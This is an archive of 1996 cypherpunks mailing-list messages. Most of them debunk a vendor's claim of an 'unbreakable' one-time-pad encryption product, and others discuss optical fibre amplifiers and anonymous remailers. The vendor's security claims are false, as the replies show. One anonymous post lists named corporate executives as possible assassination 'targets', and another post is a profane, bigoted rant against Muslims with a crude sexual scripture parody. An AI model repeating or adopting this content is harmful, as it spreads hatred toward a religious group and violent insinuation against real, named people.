> punish heavily is mostly what we call "wholesaling" and regard as an
> essential part of mundane distribution.

I'll have to defer to you on this -- I don't know the ins and outs of
commerce in Russia.  But my impression, as an uninformed layman, was that
the experience with illegal capitalist trading in the black market had
preceeded (and softened them up for?) legal capitalist transactions above
ground. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 20 Feb 1996 09:15:33 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602192141.QAA14697@homeport.org>
Message-ID: <9602192353.AA14887@alpha>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
 > For short messages, a true OTP is used directly. 

Quick question: does anybody at IPG know what the "O" in "OTP" stands
for?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ricksorak@ichange.com (Richard Sorak)
Date: Tue, 20 Feb 1996 12:26:55 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <01I1EN1CLU7S984IVQ@INCPRD.ICHANGE.COM>
MIME-Version: 1.0
Content-Type: text/plain


unsubsribe rick.sorak@ichange.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Tue, 20 Feb 1996 12:36:55 +0800
To: cypherpunks@toad.com
Subject: Guaranteed snake-oil, er, privacy...
Message-ID: <199602200202.SAA18639@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Sigh.  Here comes another one.....

         We have been trying to post this News Release to several 
         places in USENET, but are seemingly being thwarted by 
         person or persons unknown. Shortly after the posting, on 
         01-26-96, our postings were all methodically removed without
         any trace evidence. We have been unable to maintain their 
         posting since.

         We believe that the obvious malefactor may be at the root of these 
         problems. Why would 'they' try to keep this from coming to 
         light? Because 'they' know what is best for all of us. 

>> Maybe they know it's a waste of bandwidth!

The 
         posting(s) concern an extremely easy to use, unbreakable system 
         for encrypting all user sensitive data going out over Internet.
         As a reference to its unbreakability, I refer you to an 
         article by Paul Leyland on Internet at:

                http://dcs.ex.ac.uk/~aba/otp.html

         Mr. Leyland refers to some problems, which our PCX 
         system addresses and resolves.

>> That piece discusses true one-time pads. To anyone reading the posts on
Cpunks 
and sci.crypt regarding another purported purveyor of OTP technology, this is g
oing to ring some very familiar bells. Again: you can't create pseudo-randoms 
on-the-fly, algorithmically, and call it OTP. Just stop it!

[SNIP]

         The good obviously outweighs the bad. We must stop this 
         insanity of some imagined fear being advanced as the rationale 
         from keeping us from doing something that will immensely 
         benefit us all.      

         If we allow some crazed terrorist fear keep us from doing 
         something important, then we become the victims of that terror. 
         That is not right! We cannot let faceless terrorists dictate
         what we can and cannot do.  
                      
         With the forgoing in mind, we are pleased to make the 
         following press release: 
                        
>> I suppose it's possible that some intelligible text was run thru this 
package's transform, producting this example of random unintelligible gibberish!

                  If You Break our System, You've Bought our Company!


         Internet.Privacy.Guaranteed, IPG, today announced a new
         product line that guarantees privacy  for 2 to 20,000 or 
         more or more people on Internet. They back up there 
         Guarantee with their Corporate motto, 'If You Break our 
         System, You Have Bought our Company.'
  
  

         IPG Guarantees Absolute Privacy on Internet. Using the 
         trademark CRE transform, 

>> If I can find an explanation of what a CRE transform really is in any IPG
material, what do I get?

the IPG PCX Nvelopes system 
         translates any intelligble digitized information into
         random gibberish. 

>> So does XOR-ing a message with the output of my compiler's "rand()"
function: does this make it secure?  
Ridiculously not.

Only one other user, or more in certain 
         instances where there is a need to know,  will have the 
         Nvelopener required to transform the random gibberish back
         into intelligible digitized information. CRE Transforms,
         trademark IPG, are the only acknowledged unbreakable method
         of so transforming digitized information. 

>> Acknowledged by whom?  Where are they?  What do they really say?  What
information was given them 
about the implementation?  Who  is IDG, what are their bona-fides?  Did they
work for the Mossad once, per 
chance?  That's always a good line.....

There are no passwords,
         encryption keys, or anything like that to conjure up, remember, 
         and perhaps forget. PCX Nvelopes usage is automatic, similar 
         to PKZIPand PKUNZIP.   Easy to install, use, add to, and
         administer.


                        It is Unbreakable   

         If an individual, or any group of individuals, break the IPG
         Privacy System, IPG will sell them their company for $1.00,
         and even give them the dollar to buy it with. If you think you
         can, just try and find out that it is impossible. There may 
         be rumors that someone has broken the system, but that is not 
         possible, it will never happen.


                     Don't Waste your time !

         How dare IPG have the unmitigated gall? When you are certain,
         then you are certain, and IPG is certain! Others dare not
         make such a brazen boast because they cannot possibly back it
         up, but IPG most certainly can.  Every informed expert of the
         technology will confirm, without reservation, that the IPG
         system is not breakable, as many already have!  There, we
         have thrown down that gauntlet, dare you pick it up?  Be
         forewarned, if you do, in your quest, you will never become a
         knight; but instead, will only become utterly benighted.

>> Would you buy an encryption system from this (wo)/man?

                               CRE Transforms

         The system uses CRE transforms, called Nvelopes, to translate 
         any meaningful digitized information into random gibberish. In
         order to convert that random gibberish back into intelligible
         usable form, a Nvelopener is required, and only the recipient
         has the required Nvelopener.

>> OH, **THAT** explains it!   ROTFL!!!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 20 Feb 1996 12:42:14 +0800
To: cypherpunks@toad.com
Subject: Re: Optical repeaters
Message-ID: <199602200205.SAA23957@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > > Optical repeaters have to pass your signal through an intermediate
electronic
>> > > stage anyway, since we have no purely optical valve/transistor
>> > > equivalents (bosons don't interact with each other at all).

>> > 	This is not true.   There is now a whole technology of optical
>> > amplifiers for fiber communications systems that used Ettrium doped
>> > fibers pumped with strong light from a laser at a slightly shorter
>> > wavelength. These fiber optical amplifiers have gains in the order of
>> > 10-12 db in a section of special doped fiber only about 10 feet long.

>Very nice! ;-)  Flouride based amplifiers should be able to handle up
>to 16 channels.  Using state of the art time-multiplex stuff of 10 Gb/sec
>gives a total throughput of 160 Gb/Sec.... smoking!

The flavor of optical amplifier and end equipment being deployed by one 
large telecomm company (ahem) over the next couple of years 
uses 8 colors, each at 2.4 Gbps (OC-48), giving about 20 Gbps,
which is about 10 times the current capacity (1.7 Gbps.)
(Some other telecomm companies are deploying 3-colors of OC-48.)
A nice thing about the optical amplifiers is that they have about triple
the range of the current regenerators, so one amplifier can replace about
16-24 regens,
reducing the amount of equipment that can fail and produce downtime.
Because of this increased capacity, it's a good time to upgrade to SONET rings
(which are dual rings that provide self-healing similar to FDDI's;
SONET self-repair typically takes 60 ms instead of the several minutes
to cross-connect the equivalent pile of T3s using current equipment.)

If the FBI wants to wiretap this stuff, they'll have to get on the ball :-)

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281

! Frank Zappa for President !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 20 Feb 1996 09:42:18 +0800
To: ipgsales@cyberstation.net
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <9602200007.AA09268@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> From owner-cypherpunks@toad.com  Mon Feb 19 17:50:19 1996
> Date: Mon, 19 Feb 1996 17:17:52 -0600 (CST)
> From: IPG Sales <ipgsales@cyberstation.net>

> We are not currently revealing all the details of our system because of 
> patents in process, and other relat6ed matters. We are offering the 
> software. You should be able to readily decompile it and determine the 
> algorithms used andf how they are used to generate random number sequences 
> for very long files.  For short messages, a true OTP is used directly. 

Marketing Fluff - read "we don't *want* to revel it".  Patent stuff doesn't
take long to get the initial disclosures filed.  Cypherpunks are 
generally engineers and are immune to such crap.  

> If you are aware of encrtypting technology, you recognize that hardware 
> prime number cycle wheels for the basis of some of the most secured 
> hardware systems employed for encryption. We simply expand that technogy 
> using software to set an intial setting, an adder, and a limit for 64 
> such wheels, using large random prime numbers for each of those settings. 
> The total number of possibilities is over 10 to the 1690th power and can 
> be much larger. 

So.  Large "random" prime numbers are generated.  From what?  How?
Obviously these act as keys to your "OTP".  Figure out how to 
match this prime and you can generate the same "OTP".

> Thus we can eliminate the need to have the length of the OTP to be equal 
> to the length of the file - if you do not belive that it works, try it 
> and see - it takes inly a few hours to set such a trial up. We generated 
> over 790 gigabytes of charcaters, on multiple backups, and tested. Our 
> standard deviations, chi squares, Delta ICs for bits, characters, sets, 
> and the entire set were random. The sets are random, and you can take 
> that to the bank. 

So the data coming out appears random.  Big whoopie.  Lots of algorithms
can generate the same thing.

The key is how do you seed that random number generator? 

This isn't even close to being a OTP.  A OTP by definition has a random
set of data that is transmitted to the receipient over a seperate
secure channel from the actual message to be sent.  The actual message
and the OTP are XOR'ed together and sent.  The receipient then XORs
the OTP and the encrypted message to get plaintext.

That is pretty simple - even a marketing drone should be able to figure
that one out.

Now - explain how (in generic terms) your system acts as a OTP.

> Someone, will decompile it and discover that it is truly random, at least 
> from the practical usage basis. But we need that time to file patents, 
> cvopyrights and the like. 

Yes - hopefully someone will take the time and money to decompile it.
.... but if you are so sure of yourself,
why not give away some demo copies.  Why not source of the security
functions?  (Shove that patent crap someplace - you wouldn't be 
selling it if your disclosures weren't already filed)

> The IPG system solves the key management problem and produces a truly 
> unbreakabkle system. We make no apologies for not currently revealing all 
> of the methodologies andf algorithms, but they will be revealed with 
> time, by us or others, and you will discover that it is indeed a simple, 
> easy to use, easy to install, truly unbreakable system.

"unbreakable" - Bullshit - you obviously don't know crap.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 20 Feb 1996 12:59:17 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219183616.5326D-100000@citrine.cyberstation.net>
Message-ID: <Pine.SOL.3.91.960219182832.15301D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Monty, my squeaky python, has a pop quiz for you. 

1) What is the definition of a One TIme Pad?
2) What is the standard informtation theoretic proof of the 
   unbreakability of a One Time Pad?

Use an number 2 pencil and write on both sides of the perpetual motion
machine

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Tue, 20 Feb 1996 10:28:51 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602192346.SAA00359@jekyll.piermont.com>
Message-ID: <Pine.BSD/.3.91.960219181128.5326C-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 19 Feb 1996, Perry E. Metzger wrote:

> 
> IPG Sales writes:
> > We are not currently revealing all the details of our system because of 
> > patents in process,
> 
> Bull. Once you have applied for the patent you no longer need be
> secret -- indeed, you can still apply for a patent up to one year
> after full publication.
True, but we are not sure what is going to be covered by patents, 
obviously you must know that wemay have to treat some of the information, 
maybe all of the really iomportant stuff as trad secret material and try 
our best to protect it inm that manner - we cannot depend upon the 
paatents until we know what is going to be covered, if anything - so bull
back to you.

> 
> > We are offering the software. You should be able to readily
> > decompile it and determine the algorithms used andf how they are
> > used to generate random number sequences for very long files.
> 
> Something tells me it wouldn't be worth my while. Until you guys get a
> clue, none of my clients on Wall Street or elsewhere are coming within
> a mile of your products. I won't even waste my time looking at them.
> 
In time they will, because keymanagem,ent makes RSA systems unmanageable 
for large organizations - offer such a suystem to Merrill Lynch and be 
laughed out of the office - only a syustem such as ours resolve that 
problem!


> > If you are aware of encrtypting technology, you recognize that hardware 
> > prime number cycle wheels for the basis of some of the most secured 
> > hardware systems employed for encryption.

Please refer to Dorthy Dennings excellent work on mathematical 
crytanalysis of wheeeled cryptosystems, and then imagine that every 
Nvelope, or suych wheeled system, was based on randomly selecting the 
prime number wheels, they do not have to be, but ours are - imagine that 
every message ever sent was sent using such an unique wheel system. 

> 
> The cypherpunks mailing list is composed of some of the most
> knowledgeable people in the field of cryptography in the
> world. Therefore, you will pardon my noting that the phrase "prime
> number cycle wheels" isn't a term any of us are familiar with. I don't
> find the term anywhere in any of the literature, I don't recall it,
> and if it was anything more than marketingese I would have. You do
> seem to know enough to know that prime numbers play a bit of a role in
> modern cryptography, but that seems to be it. They play very little
> role in non-public key systems like yours.

Are you sure that none of you are familiar with it? I have received many 
replies indicating that a large number of you are familiar with it, 
I refer you again to Denning's. Maybe you are not, but many are, 
apparently most from the replies that I am getting. Such systems are 
used at the highest level of government because they are the most secure 
systems available, excepting OTP's of course. 


> > We simply expand that technogy 
> > using software to set an intial setting, an adder, and a limit for 64 
> > such wheels, using large random prime numbers for each of those settings. 
> > The total number of possibilities is over 10 to the 1690th power and can 
> > be much larger. 
> 
> Spare us the bull. You don't get security in a crypto system from
> having impressive combinatorial explosions. A simple monoalphabetic
> substitution can claim to have 403291461126605635584000000 possible
> keys and you wouldn't trust your six year old cousin not to crack
> it. (the number would be far, far more impressive if I'd taken all
> ASCII characters instead of just the alphabet of 26 letters in to
> account).
Who in the world said it was monalpabetic substitution -  we are talking 
about the random sequences for a single message - A random prime number 
wheel system, provides a far more secure system that RSA based systesms, 
- check it out, and do some investigating instead of talking. > 
> > Someone, will decompile it and discover that it is truly random, at least 
> > from the practical usage basis.
> 
> "Truly random" and "for practical purposes" don't mix. If it isn't
> truly random, then the question is whether or not the thing is, in
> fact, a strong encryption system.
> 
> Time and time again, snake oil salesmen come up and delude themselves
> and others into thinking that they have some sort of great encryption
> system and time and time again it cracks open like an egg. You guys
> have all the stigmata.
> 
> > The IPG system solves the key management problem
> 
> Public key cryptography did that 20 years ago. Where have you been?
> 
> > and produces a truly unbreakabkle system.
> 
> The only system that is truly unbreakable is a true one time pad, not
> a fake one.
> 
> > We make no apologies for not currently revealing all 
> > of the methodologies and algorithms,
> 
> Too bad. You should be embarassed to even open your mouths. 

Not until we know what patent coverage is going to do and not to do.

> 
> Perry
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Feb 1996 11:39:05 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers not heard from; info?
Message-ID: <ad4e5d6b01021004b456@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 PM 2/19/96, Alex Strasheim wrote:
>
>o   Depending on a remailer to strip your sig doesn't give you security wrt
>the remailer operator.  If you use encryption, the last remailer on the
>chain will see your sig, which will be in the innermost encrypted block.
>That defeats the purpose of chaining.  If you're not using encryption, you
>don't have any security anyay.

Exactly.

Further, in an earlier message Bruce Baugh asked why some remailers did not
more promptly remail their messages. Bruce, you need to look at Raph
Levien's statistics on remailers, inclduding batching/latency: rapid
responses tend to defeat the traffic analysis features of remailers!

Also, preserving subject lines through remailings, another feature Bruce is
requesting, is kind of like barium-tagging one's messages! Why use remailer
chains if the messages are tagged all the way through?

(There are wrinkles that work, such as adding a subject line based on stuff
stored inside the encrypted block a remailer opens for furhter processing.
The nth remailer can add a suject line that may be different for every hop,
or only added near or at the end of the remailings...)

Those who want more "user-friendly" remailer features would do well to
think about what the properties of an "ideal mix" are.


>A better solution might be a specialized remailer that strips sigs for
>people who need the service.  People who need sig stripping could put
>that remailer in the chain, and the rest of us could handle our sigs on
>our own.

And for "casual-grade remailing," where no encryption is used and where
minimal other mix features are used, there are Web pages that will send
simple messages through a user-selectable remailer
(http://www.c2.org:80/remail/by-www.html).

This Web remailer will _not_ automatically add a .sig, as it is not a mail
program per se, and the only text that is remailed is what is entered into
the on-screen window.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 20 Feb 1996 02:38:07 +0800
To: cypherpunks@toad.com
Subject: Assassination Biz
Message-ID: <199602191740.SAA14401@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Hey, Jim Bell, here are some clients, or competitors, or best, 
targets?



The Hit Men (Newsweek, Feb 26, 96)

Call it "in-your-face-capitalism." You lose your job, your ex-
employer's stock price rises, the CEO gets a fat raise. Today,
the more people a company fires, the more Wall Street loves
it, the higher its stock price goes.

Cheer up, you're serving the greater good by being blown away
by what economist Joseph Schumpeter christened "the gale of
creative destruction."

The world is changing and no matter how big and rich a company
is, it has to adapt or die. But Wall Street and Big Business
have made a bad problem worse by being greedheads. Lots of
CEOs have messed up big time. They let payrolls get bloated.
Then to recoup, the offer up employees as sacrifices to
Mammon, god of Wall Street, hoping to get their stock price
back up. When the price rises, it's like Wall Street spitting
on the victim's bodies.

Corporate heads, salaries and layoffs:

Robert Allen, AT&T. Salary: $3,362,000, 40,000 layoffs.

Louis Gerstner, IBM, $2,625,000, 60,000.

Robert Palmer, Digital Equipment, $900,016, 20,000.

Walter Shipley, Chemical/Chase, $2,496,154, 12,000.

Charles Lee, GTE. $2,004,115, 17,000.

Ronald Allen, Delta Air Lines, $475,000, 15,000.

John McDonnell, McDonnell Douglas, $577,791, 17,000.

Robert Stempel, General Motors, $1,000,000, 74,000.

Edward Brennan, Sears, Roebuck, $3,075,000, 50,000.

Michael Miles, Philip Morris, $1,000,000, 14,000.

Frank Shrontz, Boeing, $1,420,935, 28,000.

William Ferguson, CEO Nynex, $800,000, 16,800.

Albert Dunlap, Scott Paper. $100,000,000 in salary, stock
profits and other perks, 11,000.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 20 Feb 1996 09:10:42 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219170127.5326A-100000@citrine.cyberstation.net>
Message-ID: <199602192346.SAA00359@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
> We are not currently revealing all the details of our system because of 
> patents in process,

Bull. Once you have applied for the patent you no longer need be
secret -- indeed, you can still apply for a patent up to one year
after full publication.

> We are offering the software. You should be able to readily
> decompile it and determine the algorithms used andf how they are
> used to generate random number sequences for very long files.

Something tells me it wouldn't be worth my while. Until you guys get a
clue, none of my clients on Wall Street or elsewhere are coming within
a mile of your products. I won't even waste my time looking at them.

> If you are aware of encrtypting technology, you recognize that hardware 
> prime number cycle wheels for the basis of some of the most secured 
> hardware systems employed for encryption.

The cypherpunks mailing list is composed of some of the most
knowledgeable people in the field of cryptography in the
world. Therefore, you will pardon my noting that the phrase "prime
number cycle wheels" isn't a term any of us are familiar with. I don't
find the term anywhere in any of the literature, I don't recall it,
and if it was anything more than marketingese I would have. You do
seem to know enough to know that prime numbers play a bit of a role in
modern cryptography, but that seems to be it. They play very little
role in non-public key systems like yours.

> We simply expand that technogy 
> using software to set an intial setting, an adder, and a limit for 64 
> such wheels, using large random prime numbers for each of those settings. 
> The total number of possibilities is over 10 to the 1690th power and can 
> be much larger. 

Spare us the bull. You don't get security in a crypto system from
having impressive combinatorial explosions. A simple monoalphabetic
substitution can claim to have 403291461126605635584000000 possible
keys and you wouldn't trust your six year old cousin not to crack
it. (the number would be far, far more impressive if I'd taken all
ASCII characters instead of just the alphabet of 26 letters in to
account).

> Someone, will decompile it and discover that it is truly random, at least 
> from the practical usage basis.

"Truly random" and "for practical purposes" don't mix. If it isn't
truly random, then the question is whether or not the thing is, in
fact, a strong encryption system.

Time and time again, snake oil salesmen come up and delude themselves
and others into thinking that they have some sort of great encryption
system and time and time again it cracks open like an egg. You guys
have all the stigmata.

> The IPG system solves the key management problem

Public key cryptography did that 20 years ago. Where have you been?

> and produces a truly unbreakabkle system.

The only system that is truly unbreakable is a true one time pad, not
a fake one.

> We make no apologies for not currently revealing all 
> of the methodologies andf algorithms,

Too bad. You should be embarassed to even open your mouths.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Feb 1996 11:44:52 +0800
To: cypherpunks@toad.com
Subject: Fuck Islam and the Apologists Cluttering Up this List with Defenses of It
Message-ID: <ad4e619e02021004b0cd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 AM 2/20/96, Sean Gabb wrote:
>I did say I wouldn't send this review.  But having broken purdah once
>already this evening, I see no harm in doing so again.
>
>Sean Gabb.
...

All of you in the following list please take me off your list of responses:

Sean Gabb <cea01sig@gold.ac.uk>, Alan Horowitz <alanh@infi.net>, Ashfaq
Rasheed <ashfaq@corp.cirrus.com>, jpb@miamisci.org

(Generally, I don't see why people keep letting the cc: and To: fields get
cluttered up with additional names, unless someone is not reading the CP
list, in which case who cares if they don't get it?)


Please don't send me separate copies (in addition to what is sent to the
IslamPunks mailing list) of this Muslim crap....it's bad enough seeing the
pro-Muslim apologists explaining why the Word of Allah (hollow be his name)
is more liberating than any decadent, Western system can be, about how
women are more free under Islam because they have the freedom to be
obedient to the will of her husband and Allah (hollow be his name), the
freedom to be beaten with sticks if they show their face in public, and the
freedom to have their devil organs removed.

And don't send me any more apologies about how it is only "Arab Islam" that
is barbaric and authoritarian...the Persians don't exactly like to be
called Arabic, and yet the Persian/Iranian branch (Shiite) is amongst the
most backward of all the Muslim sects. (Women dismissed from their
professional jobs when Khomeini took over, forced to wear the chador, death
warrant on Rushdie, and so on.)

--Tim May




[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should fuck him." So the two daughters got him drunk and
screwed him all that night. Sure enough, Dad got them pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents,
your pet dog, or the farm animals, unless God tells you to. [excerpts from
the Old Testament, Modern Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 20 Feb 1996 11:18:14 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: Remailers not heard from; info?
Message-ID: <2.2.32.19960220005246.00694dcc@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:31 PM 2/19/96 -0800, bruce@aracnet wrote:

>A fix along the lines of
>
>::
>don't-send-anything-after-this
>
>might be readily applicable.

Don't some remailers support the "Cutmarks"
header, which does essentially that?

A useful reference for this is Raph's remailers list; among
the numbers and cryptic little charts is a listing of
which remailers support which features.

dave



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSkaFDVTwUKWHSsJAQGCjAf+K5TW4yRol6a0L2xclbrU84MMA3FtmpCE
xyx016KEOxEfVGBflsg3phRYSfY13Ezjxkrmkv449wsOAlRamwFpgCTcpDNU+dKk
YXrJGnQ2PMNYPXZNNK/CObHEFA2xl3peITMF27NrLcGkC2On4r+geajyV8QZo+RF
bNmPJ6fc5FTyl1BNAe0L/spucxx1wDG+IgKZP9IX+I3niJJBdxj73N4AAz3loesq
+qwB9NRceFtNYdoigYUxC9nhB0s90C1fJtkc0/M8Jv0Qd0S4FosU+e1HSCkNLgXU
ALuoXkhhRFmBAIW9Qf6aLKK4ANgt9DfmKIoHaBYy1B1GBKhxLHEWqw==
=Fzjc
-----END PGP SIGNATURE-----
-----
David E. Smith,  c/o Southeast Missouri State University
1000 Towers Circle South MS 1210 Cape Girardeau MO 63701
dsmith@midwest.net, dsmith@alpha.c2.org,  PGP 0x961D2B09
(573)339-3814    http://www.midwest.net/scribers/dsmith/
"Reality is only for those lacking in true imagination."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 20 Feb 1996 11:01:16 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: NET_run [NOISE]
Message-ID: <2.2.32.19960220005248.00695cbc@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:54 PM 2/19/96 -0800, bruce@aracnet wrote:

>>      Sometime next month a game will be played on the
>>      Internet, challenging surfers to leap between sites,
>>      solving puzzles and cracking codes that will give them
>>      access to secret data hidden behind firewalls and
>>      software barriers. 
>
>Netrunner is indeed a card game. As part of the intro publicity, some demo
>games will be run on the Web. (No, no info about that at the moment.) The
>rest is the intersection of overenthusiastic publicity folks and clueless
>reporters. "Go, marketing department, go" were the exact words of my friend.

Which is based on the even more cool Cyberpunk (no, not Cypherpunk, but
it seems that way in my own games) traditional role-playing game.

Actually, that's not a small percentage of why I keep up with all the
noise on this list - you get some _great_ game ideas.

<<perrygram elided>>

dave



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSkafjVTwUKWHSsJAQEI7gf9HwKWFS489/ljLT9OtQxpfLP5dqOtCkFg
7IW65RvYfuwS/G6bkpc9pOUGGabnsI/rak7AtzJwXlqtI6DJnTl7MSNoA+vdddQX
t7eLv4d9phTSBg3s5N1upOZuLO8239pWmx+y0Rknzo1qkZ9P0pQPOFqHdhsem5TA
X/AtP1nLyno8dKlOLcdcqk3p5CLQt6v3X/sZN10Y1N6JYXcxmY3VbFWMBjmWjAZi
Qv9awTjBvLem+NHF/alEkRR2AIeswLwl7jB/P9zZ/R4x1NfcGYKGWRnT+6cFITrM
UYH+WxqYZGcrY3ECVJ8IrylFJ/MJsBDyUpw+ZXIbh9BjQmD8GfiukQ==
=TPrG
-----END PGP SIGNATURE-----
-----
David E. Smith,  c/o Southeast Missouri State University
1000 Towers Circle South MS 1210 Cape Girardeau MO 63701
dsmith@midwest.net, dsmith@alpha.c2.org,  PGP 0x961D2B09
(573)339-3814    http://www.midwest.net/scribers/dsmith/
"Reality is only for those lacking in true imagination."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 20 Feb 1996 14:17:01 +0800
To: Alexandra Griffin <cypherpunks@toad.com
Subject: Re: Optical repeaters
Message-ID: <m0toiH0-00090QC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:45 PM 2/19/96 -0500, Alexandra Griffin wrote:
>I wrote:
>
>> > Optical
>> > repeaters have to pass your signal through an intermediate electronic
>> > stage anyway, since we have no purely optical valve/transistor
>> > equivalents (bosons don't interact with each other at all).
>
>Dave Emery responds:
>> 	This is not true.   There is now a whole technology of optical
>> amplifiers for fiber communications systems that used Ettrium doped
>> fibers pumped with strong light from a laser at a slightly shorter
>> wavelength. These fiber optical amplifiers have gains in the order of
>> 10-12 db in a section of special doped fiber only about 10 feet long.
>
>You're right, I do remember reading about these somewhere... didn't
>realize they were already in use.

Actually, they're in very common usage today.


[stuff deleted]

>> 	The current generation of undersea cables from the US to Europe
>> use these amplifiers instead of the more traditional regenerating
>> repeaters that convert the light to electronic signals, reclock the data
>> stream and convert it back to light with another laser diode.   There is
>> no conversion from light to digital electronic signals all the way from
>> Rhode Island to England - the same light pulses that go into the fiber
>> on one side of the Atlantic come out on the other end without ever
>> having been converted to electronic form in between.
>
>You said power for the amps comes from a high-intensity,
>shorter-wavelength beam... can this be superimposed on the original
>signal at the point of origin, as with in-line coax-cable amplifiers?

Uh, no.  See, the problem is that the (long)transmission fiber has even more 
attenuation at about 980 nm (the "pump wavelength) than about 1500, the 
wavelength of interest.  It is necessary to generate and apply the power at 
the amplifier site.

>> 	 These amplfiers have enourmous bandwidth, and can be used to
>> amplify several slightly different wavelengths of light allowing
>> wavelength division multiplexing of multiple streams of light flashes of
>> slightly different "colors" (all the current technology works at around
>> 1500 nm which is well into the infrared).   This can expand the capacity
>> of a single fiber to four to six times the 5 Gb/sec that is the current
>> state of the art.
>
>Nice... :)

They are!  Truly amazing technology.  It's like a "negative-loss" cable.  
Invented about 10 years ago, and they vastly improved the ability to do LD 
communications through fiber.  Huge bandwidth, compared to current usage.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Tue, 20 Feb 1996 11:20:43 +0800
To: "Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <9602200007.AA09268@spirit.aud.alcatel.com>
Message-ID: <Pine.BSD/.3.91.960219183616.5326D-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 19 Feb 1996, Daniel R. Oelke wrote:

> > From owner-cypherpunks@toad.com  Mon Feb 19 17:50:19 1996
